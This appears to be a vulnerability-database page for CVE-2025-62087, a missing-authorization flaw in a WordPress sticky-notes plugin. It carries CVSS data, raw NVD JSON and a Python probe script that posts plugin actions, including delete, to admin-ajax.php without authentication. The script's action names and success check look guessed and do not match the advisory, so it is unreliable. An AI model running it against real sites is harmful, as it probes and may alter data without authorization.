Security Vulnerability Report
中文
CVE-2025-62087 CVSS 4.3 MEDIUM

CVE-2025-62087

Published: 2025-12-31 16:15:44
Last Modified: 2026-04-23 15:34:31

Description

Missing Authorization vulnerability in Web Builder 143 Sticky Notes for WP Dashboard wb-sticky-notes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sticky Notes for WP Dashboard: from n/a through <= 1.2.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

wb-sticky-notes (Sticky Notes for WP Dashboard) <= 1.2.4
从初始版本到1.2.4的所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62087 PoC - Sticky Notes Authorization Bypass # Affected: wb-sticky-notes plugin <= 1.2.4 # Type: Missing Authorization / Broken Access Control import requests import sys TARGET_URL = "http://target-wordpress-site.com" # Replace with actual WordPress installation URL def check_vulnerability(): """ Test for missing authorization in wb-sticky-notes plugin. This PoC attempts to access admin functions without proper authentication. """ # Test endpoint 1: Direct access to sticky notes admin function endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-json/wp/v2/wb-sticky-notes", ] # Common vulnerable actions in this plugin vulnerable_actions = [ "wb_sticky_notes_save", "wb_sticky_notes_delete", "wb_sticky_notes_get_all", "wb_sticky_notes_update" ] print("[*] Testing for CVE-2025-62087 Authorization Bypass...") print(f"[*] Target: {TARGET_URL}") for endpoint in endpoints: for action in vulnerable_actions: try: # Attempt to access without authentication data = { "action": action, # Add plugin-specific parameters } response = requests.post(endpoint, data=data, timeout=10) # Check if response indicates successful unauthorized access if response.status_code == 200: # Check for data exposure or successful operation if "sticky_notes" in response.text.lower() or response.text != "0": print(f"[!] Potential vulnerability found at {endpoint}") print(f"[!] Action: {action} - Response indicates possible unauthorized access") print(f"[+] Response preview: {response.text[:200]}") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") print("[*] Scan complete. No obvious vulnerability detected.") return False if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62087", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:44.280", "lastModified": "2026-04-23T15:34:30.927", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Web Builder 143 Sticky Notes for WP Dashboard wb-sticky-notes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sticky Notes for WP Dashboard: from n/a through <= 1.2.4."}, {"lang": "es", "value": "Vulnerabilidad por ausencia de autorización en Web Builder 143 Sticky Notes for WP Dashboard permite explotar niveles de seguridad de control de acceso mal configurados. Este problema afecta a Sticky Notes para WP Dashboard: desde n/a hasta 1.2.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wb-sticky-notes/vulnerability/wordpress-sticky-notes-for-wp-dashboard-plugin-1-2-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}